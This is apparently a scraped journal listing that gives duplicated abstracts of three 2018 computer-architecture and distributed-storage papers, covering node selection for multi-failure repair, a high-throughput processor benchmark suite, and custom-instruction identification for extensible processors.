In distributed storage systems, how to optimize the regeneration time of lost data so as to keep high reliability has attracted attention increasingly. Recent researches reveal that node selection mechanism during repair progress has great impact on regeneration time. SPSN (select provider select newcomer) algorithm has put forward by some studies, which suits the scenario of single node failure well. However, it is very common to repair many modes at the same time in actual system. In this scenario, SPSN algorithm will no longer be optimal taking large time and space consumption into consideration. By analyzing the data failure trace of real distributed file system, we propose a node selection algorithm B-WSJ (bandwidth based weak and strong judgement) based on the existing algorithms and repairing model with the characteristic of parallelism which is suitable for multi-failure scenario. In order to describe the algorithm better, we firstly define several concepts of node-relationship on a link. Secondly we use these concepts to realize the weak and strong judgment of target node with pre-process and pruning strategy added. Finally, the nodes with better bandwidth will be chosen. To evaluate the performance of NS algorithm, we use Waxman algorithm to generate network topology and do many experiments with node failure models in real system provided by FTA (failure trace archive). The experimental results show the performance of B-WSJ algorithm can be improved greatly compared with the existing algorithms.
In distributed storage systems, how to optimize the regeneration time of lost data so as to keep high reliability has attracted attention increasingly. Recent researches reveal that node selection mechanism during repair progress has great impact on regeneration time. SPSN (select provider select newcomer) algorithm has put forward by some studies, which suits the scenario of single node failure well. However, it is very common to repair many modes at the same time in actual system. In this scenario, SPSN algorithm will no longer be optimal taking large time and space consumption into consideration. By analyzing the data failure trace of real distributed file system, we propose a node selection algorithm B-WSJ (bandwidth based weak and strong judgement) based on the existing algorithms and repairing model with the characteristic of parallelism which is suitable for multi-failure scenario. In order to describe the algorithm better, we firstly define several concepts of node-relationship on a link. Secondly we use these concepts to realize the weak and strong judgment of target node with pre-process and pruning strategy added. Finally, the nodes with better bandwidth will be chosen. To evaluate the performance of NS algorithm, we use Waxman algorithm to generate network topology and do many experiments with node failure models in real system provided by FTA (failure trace archive). The experimental results show the performance of B-WSJ algorithm can be improved greatly compared with the existing algorithms.
2018, 55(7): 1569-1583.
DOI: 10.7544/issn1000-1239.2018.20170053
Abstract:
Benchmarks are important means to evaluate processor microarchitecture. The high-throughput application is a kind of application that focuses on throughput efficiency and contents a large number of loosely coupled small-scale jobs. The typical characteristics of high-throughput application are high throughput, hard real-time and high concurrency. The key target of processor microarchitecture design for high-throughput application is how to improve the throughput efficiency of operations. The design of high-throughput processor microarchitecture needs micro benchmark from high-throughput application as evaluation basis for designing high efficient processing architecture. While for now, existing benchmarks can not effectively and comprehensively evaluate the processor microarchitecture design for high-throughput application. In this paper, we propose a suit of new benchmarks—HTC-MicroBench—for the evaluation of designing the processor microarchitecture for high-throughput application. Firstly, we present a classification method for high-throughput applications based on the features of workloads. Secondly, according to the characteristics of high-throughput application, we present a parallelization model based on Pthread model to design and implement HTC-MicroBench. Furthermore, we evaluate HTC-MicroBench from many aspects, such as concurrency, data coupling and cache efficiency. Finally, we use HTC-MicroBench to evaluate the speedup of TILE-Gx and Xeon. The evaluation results show that HTC-MicroBench can effectively evaluate the processor microarchitecture design for high-throughput application.
Benchmarks are important means to evaluate processor microarchitecture. The high-throughput application is a kind of application that focuses on throughput efficiency and contents a large number of loosely coupled small-scale jobs. The typical characteristics of high-throughput application are high throughput, hard real-time and high concurrency. The key target of processor microarchitecture design for high-throughput application is how to improve the throughput efficiency of operations. The design of high-throughput processor microarchitecture needs micro benchmark from high-throughput application as evaluation basis for designing high efficient processing architecture. While for now, existing benchmarks can not effectively and comprehensively evaluate the processor microarchitecture design for high-throughput application. In this paper, we propose a suit of new benchmarks—HTC-MicroBench—for the evaluation of designing the processor microarchitecture for high-throughput application. Firstly, we present a classification method for high-throughput applications based on the features of workloads. Secondly, according to the characteristics of high-throughput application, we present a parallelization model based on Pthread model to design and implement HTC-MicroBench. Furthermore, we evaluate HTC-MicroBench from many aspects, such as concurrency, data coupling and cache efficiency. Finally, we use HTC-MicroBench to evaluate the speedup of TILE-Gx and Xeon. The evaluation results show that HTC-MicroBench can effectively evaluate the processor microarchitecture design for high-throughput application.
2018, 55(7): 1584-1596.
DOI: 10.7544/issn1000-1239.2018.20170384
Abstract:
As extensible processors can provide good trade-offs among design cycle, flexibility, performance and power consumption, extensible processors are used more and more in embedded systems and electronic devices in recent years. Automatic identification of custom instructions is the key to the design of extensible processors. In this paper, we present and implement an iterative design flow for identifying maximal convex custom instructions (MCSs) from a given application code. The design flow addresses two essential problems: MCSs enumeration problem and MCSs selection problem. In order to solve the MCSs enumeration problem, we propose a very efficient algorithm for enumerating all maximal convex subgraphs using a sandwich manner that combines the advantage of the bottom-up manner and the top-down manner. Compared with the latest algorithms, our algorithm can achieve orders of magnitude speedup. Experimental results show that the achieved speedup ranging from 5.6x to 47.3x. In the process of selecting MCSs, we observe that the number of candidates is usually small. Furthermore, a large number of search space can be pruned by applying the non-overlapping rule. Therefore, it is more interesting to use an exact algorithm for selecting MCSs. With the proposed exact algorithm, optimal solutions for maximizing the performance improvement can be found in most cases.
As extensible processors can provide good trade-offs among design cycle, flexibility, performance and power consumption, extensible processors are used more and more in embedded systems and electronic devices in recent years. Automatic identification of custom instructions is the key to the design of extensible processors. In this paper, we present and implement an iterative design flow for identifying maximal convex custom instructions (MCSs) from a given application code. The design flow addresses two essential problems: MCSs enumeration problem and MCSs selection problem. In order to solve the MCSs enumeration problem, we propose a very efficient algorithm for enumerating all maximal convex subgraphs using a sandwich manner that combines the advantage of the bottom-up manner and the top-down manner. Compared with the latest algorithms, our algorithm can achieve orders of magnitude speedup. Experimental results show that the achieved speedup ranging from 5.6x to 47.3x. In the process of selecting MCSs, we observe that the number of candidates is usually small. Furthermore, a large number of search space can be pruned by applying the non-overlapping rule. Therefore, it is more interesting to use an exact algorithm for selecting MCSs. With the proposed exact algorithm, optimal solutions for maximizing the performance improvement can be found in most cases.